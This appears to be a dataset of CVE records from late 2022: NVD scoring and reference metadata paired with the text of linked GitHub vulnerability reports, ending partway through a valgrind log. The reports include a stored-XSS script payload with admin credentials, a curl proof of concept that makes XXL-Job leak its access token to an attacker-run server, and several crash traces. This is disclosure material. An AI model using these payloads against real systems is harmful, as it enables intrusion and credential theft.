[ "rickxy", "Student-Attendance-Management-System" ]
## Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4 input admin@mail.com / Password@123 Log in to the background. At manage classes, click create class, enter xsspayload:<script>alert ("ace")</script>, and click save。 ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/xssclass.png) and then refresh the interface to pop up ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/alertace.png) createClass.php: After clicking save, the className is substituted into the input for query. If it does not exist, the className will be reinserted into the database. Because the script is not escaped from html, the XSS vulnerability is caused ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/XSShouduandaima.png)
Student Attendance Management System has a storage XSS vulnerability
https://api.github.com/repos/rickxy/Student-Attendance-Management-System/issues/3/comments
0
2022-11-17T06:52:34Z
2022-11-18T00:12:28Z
https://github.com/rickxy/Student-Attendance-Management-System/issues/3
1,452,813,739
3
4,404
CVE-2022-41920
2022-11-17T18:15:10.100
Lancet is a general utility library for the go programming language. Affected versions are subject to a ZipSlip issue when using the fileutil package to unzip files. This issue has been addressed and a fix will be included in versions 2.1.10 and 1.3.4. Users are advised to upgrade. There are no known workarounds for this issue.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/duke-git/lancet/commit/f133b32faa05eb93e66175d01827afa4b7094572" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/duke-git/lancet/commit/f869a0a67098e92d24ddd913e188b32404fa72c9" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/duke-git/lancet/issues/62" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/duke-git/lancet/security/advisories/GHSA-pp3f-xrw5-q5j4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/duke-git/lancet/commit/f133b32faa05eb93e66175d01827afa4b7094572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/duke-git/lancet/commit/f869a0a67098e92d24ddd913e188b32404fa72c9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/duke-git/lancet/issues/62" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/duke-git/lancet/security/advisories/GHSA-pp3f-xrw5-q5j4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lancet_project:lancet:*:*:*:*:*:go:*:*", "matchCriteriaId": "B1C2AAFE-19C2-489A-942C-6F0F833A348D", "versionEndExcluding": "1.3.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:lancet_project:lancet:*:*:*:*:*:go:*:*", "matchCriteriaId": "B662D915-5AC9-44EA-9E0A-B765A89ACE6E", "versionEndExcluding": "2.1.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/duke-git/lancet/issues/62
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "duke-git", "lancet" ]
Hello 👋 I found a potential security issue in lancet, how can I get in touch with you in a private way and submit my security report? Could you add a SECURITY.md file with an e-mail address for me to send further details to? GitHub [recommends](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.
How to get in touch regarding a security concern?
https://api.github.com/repos/duke-git/lancet/issues/62/comments
1
2022-11-15T12:14:14Z
2022-11-17T08:22:38Z
https://github.com/duke-git/lancet/issues/62
1,449,687,711
62
4,405
CVE-2022-43183
2022-11-17T21:15:15.837
XXL-Job before v2.3.1 contains a Server-Side Request Forgery (SSRF) via the component /admin/controller/JobLogController.java.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/3002" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/3002" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9117C48-ADBB-4018-8476-F291CA8A2BF4", "versionEndExcluding": null, "versionEndIncluding": "2.3.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/xuxueli/xxl-job/issues/3002
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands 1. Vulnerability description XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community. There is an SSRF vulnerability in xxl-job-2.3.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobLogController.java of Xxl-job 2.3.1, which originates from /logDetailCat, it directly sends a query log request to the address specified by executorAddress without judging whether the executorAddress parameter is the valid executor address. The query request will have the XXL-JOB-ACCESS- TOKEN, resulting in the leakage of XXL-JOB-ACCESS-TOKEN, and then the attacker obtains XXL-JOB-ACCESS-TOKEN and calls any executor, causing the execution of arbitrary commands of the executor. The /logDetailCat interface call only needs to be a low Privilege user of the platform。 2.Affected version Xxl-job-admin =< 2.3.1 (latest) 3.Proof of concept 1、build an http server locally and print the http request header log. <img width="491" alt="image" src="https://user-images.githubusercontent.com/30720563/194810951-b70ca4e3-537d-4213-a1d6-589cff1b1150.png"> 2、Create a normal user normal without any executor permissions。 ![image](https://user-images.githubusercontent.com/30720563/194811012-ada1595e-27fb-416a-9496-e90208d48364.png) ![image](https://user-images.githubusercontent.com/30720563/194811120-765f24fb-ffb6-4364-ad97-666993b7bc4c.png) 3、When using the normal user to call the interface, set the input parameter executor Address to the http server address in step 1, and print the XXL-JOB-ACCESS-TOKEN directly on the target server `curl 'http://localhost:8080/xxl-job-admin/joblog/logDetailCat' \ -H 'Accept: application/json, text/javascript, */*; q=0.01' \ -H 'Accept-Language: zh-CN,zh;q=0.9' \ -H 'Connection: keep-alive' \ -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \ -H 'Cookie: Idea-6a85f0b8=3349f800-77dc-4e25-a562-885457beb2aa; XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a226e6f726d616c222c2270617373776f7264223a223563373066666266643839303065626533643037326562346162353064376162222c22726f6c65223a302c227065726d697373696f6e223a22227d' \ -H 'Origin: http://localhost:8080' \ -H 'Referer: http://localhost:8080/xxl-job-admin/' \ -H 'Sec-Fetch-Dest: empty' \ -H 'Sec-Fetch-Mode: cors' \ -H 'Sec-Fetch-Site: same-origin' \ -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36' \ -H 'X-Requested-With: XMLHttpRequest' \ -H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"' \ -H 'sec-ch-ua-mobile: ?0' \ -H 'sec-ch-ua-platform: "macOS"' \ --data-raw 'executorAddress=http://10.224.203.118&logId=0&fromLineNum=0&triggerTime=1586629003729' \ --compressed ` ![image](https://user-images.githubusercontent.com/30720563/194811641-0de09316-1aaa-44f5-bcff-18ae957cf5f2.png) ![image](https://user-images.githubusercontent.com/30720563/194811628-82e7ffcf-3861-4b21-80ce-8f53dddf1e3b.png) 4、Use the token to call the task trigger interface of the executor Restful API to execute arbitrary commands ![image](https://user-images.githubusercontent.com/30720563/194812076-91de121f-f50c-4322-8327-a5f1939fa408.png) 4、Recommendations The same as in JobLogController.java, when matching the /joblog route, it will enter the index method to judge whether the 'executorAddress executor address belongs to the executor address.
xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands
https://api.github.com/repos/xuxueli/xxl-job/issues/3002/comments
5
2022-10-10T06:59:34Z
2023-03-23T10:51:45Z
https://github.com/xuxueli/xxl-job/issues/3002
1,402,687,023
3,002
4,406
CVE-2022-39389
2022-11-17T22:15:10.547
Lightning Network Daemon (lnd) is an implementation of a lightning bitcoin overlay network node. All lnd nodes before version `v0.15.4` are vulnerable to a block parsing bug that can cause a node to enter a degraded state once encountered. In this degraded state, nodes can continue to make payments and forward HTLCs, and close out channels. Opening channels is prohibited, and also on chain transaction events will be undetected. This can cause loss of funds if a CSV expiry is researched during a breach attempt or a CLTV delta expires forgetting the funds in the HTLC. A patch is available in `lnd` version 0.15.4. Users are advised to upgrade. Users unable to upgrade may use the `lncli updatechanpolicy` RPC call to increase their CLTV value to a very high amount or increase their fee policies. This will prevent nodes from routing through your node, meaning that no pending HTLCs can be present.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.2, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lightningnetwork/lnd/issues/7096" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/lightningnetwork/lnd/pull/7098" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/lightningnetwork/lnd/releases/tag/v0.15.4-beta" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/lightningnetwork/lnd/security/advisories/GHSA-hc82-w9v8-83pr" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lightningnetwork/lnd/issues/7096" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/lightningnetwork/lnd/pull/7098" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/lightningnetwork/lnd/releases/tag/v0.15.4-beta" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/lightningnetwork/lnd/security/advisories/GHSA-hc82-w9v8-83pr" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:btcd_project:btcd:*:*:*:*:*:*:*:*", "matchCriteriaId": "4C76213E-2BE3-4BF3-B5D1-2AA9B6BB0A95", "versionEndExcluding": "0.23.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:lightning_network_daemon_project:lightning_network_daemon:*:*:*:*:*:*:*:*", "matchCriteriaId": "E4F9DC3C-AC0A-472A-B74E-2966F1B7D3A9", "versionEndExcluding": "0.15.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/lightningnetwork/lnd/issues/7096
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "lightningnetwork", "lnd" ]
### Background lnd does not process new blocks. lnd: ``` 2022-11-01 12:02:54.658 [ERR] LNWL: Unable to process chain reorg: unable to get block 000000000000000000070742427fa10ec3c66d006160155a704d9f56d090a3ea: MsgTx.BtcDecode: too many witness items to fit into max message size [count 500003, max 500000] ``` bitcoind: ``` 2022-11-01T10:44:23Z UpdateTip: new best=000000000000000000070742427fa10ec3c66d006160155a704d9f56d090a3ea height=761249 version=0x20a00000 log2_work=93.818550 tx=776743287 date='2022-11-01T10:44:19Z' progress=1.000000 cache=21.2MiB(82459txo) ``` My bitcoind knows about block height 761255, but lnd and mempool.space are stuck at 761248. * lnd v0.15.3-beta * bitcoind v23 https://twitter.com/c_otto83/status/1587400648366202880
[bug]: CRITICAL! Unable to process chain reorg / too many witness items to fit into max message size
https://api.github.com/repos/lightningnetwork/lnd/issues/7096/comments
19
2022-11-01T11:12:11Z
2022-11-02T10:37:15Z
https://github.com/lightningnetwork/lnd/issues/7096
1,431,260,386
7,096
4,407
CVE-2022-43171
2022-11-17T23:15:23.883
A heap buffer overflow in the LIEF::MachO::BinaryParser::parse_dyldinfo_generic_bind function of LIEF v0.12.1 allows attackers to cause a Denial of Service (DoS) via a crafted MachO file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/782" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/782" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lief-project:lief:0.12.1:*:*:*:*:*:*:*", "matchCriteriaId": "BC60B6E0-1155-48A0-9CB4-1A6201D420C7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/lief-project/LIEF/issues/782
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "lief-project", "LIEF" ]
**Describe the bug** A bad macho file which can lead LIEF::MachO::Parser::parse() to a heap-buffer-overflow(read) issue. Poc here : [poc1.zip](https://github.com/lief-project/LIEF/files/9542081/poc1.zip) **To Reproduce** 1. Build the whole project with **ASAN** 2. Drive program (compile it with **ASAN** too): ```cpp // read_mecho.c #include <LIEF/LIEF.hpp> int main(int argc, char** argv){ if(argc != 2) return 0; try { std::unique_ptr<LIEF::MachO::FatBinary> macho = LIEF::MachO::Parser::parse(argv[1]); } catch (const LIEF::exception& err) { std::cerr << err.what() << std::endl; } return 0; } ``` 3. Run Poc: ```bash $ ./read_macho ./poc1.bin ``` **Expected behavior** The code snippet where the issue happened should avoid the out-bounds read operation. **Environment (please complete the following information):** - System and Version : Ubuntu 20.04 + gcc 9.4.0 - Target format : **Mach-O** - LIEF commit version: https://github.com/lief-project/LIEF/commit/ad811916670e83947560b6f3c45df6e71d3885af **Additional context** ASAN says: ```text ubuntu@ubuntu:~/test/LIEF/fuzz$ ./read_macho poc1.bin nlist[0].str_idx seems corrupted (0xaf000000) nlist[1].str_idx seems corrupted (0xaf000000) ...... nlist[355].str_idx seems corrupted (0x3d000001) Indirect symbol index is out of range (1493172225 vs max sym: 356) Wrong index: 4 Wrong index: 4 Wrong index: 4 Wrong index: 4 Wrong index: 4 Wrong index: 4 Wrong index: 4 Wrong index: 4 Wrong index: 4 ================================================================= ==502744==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000420 at pc 0x55b43d8d9b42 bp 0x7ffe61a9cf10 sp 0x7ffe61a9cf00 READ of size 8 at 0x603000000420 thread T0 #0 0x55b43d8d9b41 in std::enable_if<std::is_pointer<LIEF::MachO::SegmentCommand*>::value, LIEF::MachO::SegmentCommand&>::type LIEF::ref_iterator<std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> >&, LIEF::MachO::SegmentCommand*, __gnu_cxx::__normal_iterator<LIEF::MachO::SegmentCommand**, std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> > > >::operator*<LIEF::MachO::SegmentCommand*>() const /home/ubuntu/test/LIEF/include/LIEF/iterators.hpp:233 #1 0x55b43d8bf315 in LIEF::ref_iterator<std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> >&, LIEF::MachO::SegmentCommand*, __gnu_cxx::__normal_iterator<LIEF::MachO::SegmentCommand**, std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> > > >::operator*() /home/ubuntu/test/LIEF/include/LIEF/iterators.hpp:226 #2 0x55b43d892a91 in LIEF::ref_iterator<std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> >&, LIEF::MachO::SegmentCommand*, __gnu_cxx::__normal_iterator<LIEF::MachO::SegmentCommand**, std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> > > >::operator[](unsigned long) const /home/ubuntu/test/LIEF/include/LIEF/iterators.hpp:146 #3 0x55b43d858628 in LIEF::ref_iterator<std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> >&, LIEF::MachO::SegmentCommand*, __gnu_cxx::__normal_iterator<LIEF::MachO::SegmentCommand**, std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> > > >::operator[](unsigned long) /home/ubuntu/test/LIEF/include/LIEF/iterators.hpp:133 #4 0x55b43d8644a2 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse_dyldinfo_generic_bind<LIEF::MachO::details::MachO32>() /home/ubuntu/test/LIEF/src/MachO/BinaryParser.tcc:1629 #5 0x55b43d831a79 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse_dyldinfo_binds<LIEF::MachO::details::MachO32>() /home/ubuntu/test/LIEF/src/MachO/BinaryParser.tcc:1357 #6 0x55b43d801735 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse<LIEF::MachO::details::MachO32>() /home/ubuntu/test/LIEF/src/MachO/BinaryParser.tcc:113 #7 0x55b43d7f2348 in LIEF::MachO::BinaryParser::init_and_parse() /home/ubuntu/test/LIEF/src/MachO/BinaryParser.cpp:145 #8 0x55b43d7f1ab0 in LIEF::MachO::BinaryParser::parse(std::unique_ptr<LIEF::BinaryStream, std::default_delete<LIEF::BinaryStream> >, unsigned long, LIEF::MachO::ParserConfig const&) /home/ubuntu/test/LIEF/src/MachO/BinaryParser.cpp:125 #9 0x55b43d07bc01 in LIEF::MachO::Parser::build() /home/ubuntu/test/LIEF/src/MachO/Parser.cpp:174 #10 0x55b43d078995 in LIEF::MachO::Parser::parse(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::MachO::ParserConfig const&) /home/ubuntu/test/LIEF/src/MachO/Parser.cpp:64 #11 0x55b43cee3923 in main /home/ubuntu/test/LIEF/fuzz/read_macho.c:8 #12 0x7f2be6489082 in __libc_start_main ../csu/libc-start.c:308 #13 0x55b43cee355d in _start (/home/ubuntu/test/LIEF/fuzz/read_macho+0x33055d) 0x603000000420 is located 0 bytes to the right of 32-byte region [0x603000000400,0x603000000420) allocated by thread T0 here: #0 0x7f2be6ab2587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104 #1 0x55b43d7d7c50 in __gnu_cxx::new_allocator<LIEF::MachO::SegmentCommand*>::allocate(unsigned long, void const*) /usr/include/c++/9/ext/new_allocator.h:114 #2 0xfffcc353843 (<unknown module>) #3 0x7ffe61a9deef ([stack]+0x1deef) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ubuntu/test/LIEF/include/LIEF/iterators.hpp:233 in std::enable_if<std::is_pointer<LIEF::MachO::SegmentCommand*>::value, LIEF::MachO::SegmentCommand&>::type LIEF::ref_iterator<std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> >&, LIEF::MachO::SegmentCommand*, __gnu_cxx::__normal_iterator<LIEF::MachO::SegmentCommand**, std::vector<LIEF::MachO::SegmentCommand*, std::allocator<LIEF::MachO::SegmentCommand*> > > >::operator*<LIEF::MachO::SegmentCommand*>() const Shadow bytes around the buggy address: 0x0c067fff8030: fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa fd fd 0x0c067fff8040: fd fd fa fa fd fd fd fd fa fa 00 00 01 fa fa fa 0x0c067fff8050: 00 00 01 fa fa fa 00 00 01 fa fa fa 00 00 01 fa 0x0c067fff8060: fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa 00 00 0x0c067fff8070: 01 fa fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa =>0x0c067fff8080: 00 00 00 00[fa]fa 00 00 01 fa fa fa 00 00 01 fa 0x0c067fff8090: fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa 00 00 0x0c067fff80a0: 01 fa fa fa 00 00 01 fa fa fa fd fd fd fd fa fa 0x0c067fff80b0: 00 00 01 fa fa fa 00 00 01 fa fa fa 00 00 01 fa 0x0c067fff80c0: fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa 00 00 0x0c067fff80d0: 01 fa fa fa 00 00 01 fa fa fa 00 00 01 fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==502744==ABORTING ```
Heap-buffer-overflow in LIEF::MachO::BinaryParser::parse_dyldinfo_generic_bind at MachO/BinaryParser.tcc:1629
https://api.github.com/repos/lief-project/LIEF/issues/782/comments
0
2022-09-11T08:44:50Z
2022-09-12T08:45:03Z
https://github.com/lief-project/LIEF/issues/782
1,368,876,839
782
4,408
CVE-2022-45474
2022-11-18T18:15:10.767
drachtio-server 0.8.18 has a request-handler.cpp event_cb use-after-free for any request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/drachtio/drachtio-server/commit/860f025468feb31c43227153d8fb3f34210a522e" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/drachtio/drachtio-server/issues/240" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/drachtio/drachtio-server/commit/860f025468feb31c43227153d8fb3f34210a522e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/drachtio/drachtio-server/issues/240" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:drachtio:drachtio-server:0.8.18:*:*:*:*:*:*:*", "matchCriteriaId": "D4953169-9FF9-4362-A9E7-25416AC7FF45", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/drachtio/drachtio-server/issues/240
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "drachtio", "drachtio-server" ]
Hello, this is a follow-up after the private disclosure. When `drachtio-server` receives a call, if you run it via a debugger (valgrind in this case), you will see a use-after-free that happens by default. ``` valgrind /usr/local/bin/drachtio --contact 'sip:PUBLIC_IP;transport=udp' --contact 'sip:PUBLIC_IP;transport=tcp' --address 0.0.0.0 --port 9022 --homer 127.0.0.1:9060 --homer-id 10 ==12406== Memcheck, a memory error detector ==12406== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==12406== Using Valgrind-3.14.0 and LibVEX; rerun with -h for copyright info ==12406== Command: /usr/local/bin/drachtio --contact sip:PUBLIC_IP;transport=udp --contact sip:PUBLIC_IP;transport=tcp --address 0.0.0.0 --port 9022 --homer 127.0.0.1:9060 --homer-id 10 ==12406== checking for blacklist in config did not find blacklist at all ==12406== Warning: invalid file descriptor -1 in syscall close() ==12406== Thread 3: ==12406== Conditional jump or move depends on uninitialised value(s) ==12406== at 0x4838C65: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==12406== by 0x240146: drachtio::write_cb(void*, unsigned long, unsigned long, drachtio::RequestHandler::_ConnInfo*) (request-handler.cpp:344) ==12406== by 0x4870733: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488348A: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488CAD2: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E15C: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E2C4: curl_multi_socket_action (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x2409A6: drachtio::timer_cb(boost::system::error_code const&, drachtio::RequestHandler::_GlobalInfo*) [clone .part.450] (request-handler.cpp:333) ==12406== by 0x24119F: timer_cb (error_code.hpp:315) ==12406== by 0x24119F: drachtio::multi_timer_cb(void*, long, drachtio::RequestHandler::_GlobalInfo*) (request-handler.cpp:169) ==12406== by 0x488A47B: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488BC0B: curl_multi_add_handle (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x24294C: drachtio::RequestHandler::startRequest(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) (request-handler.cpp:538) ==12406== ==12406== Conditional jump or move depends on uninitialised value(s) ==12406== at 0x4838B06: strncat (in 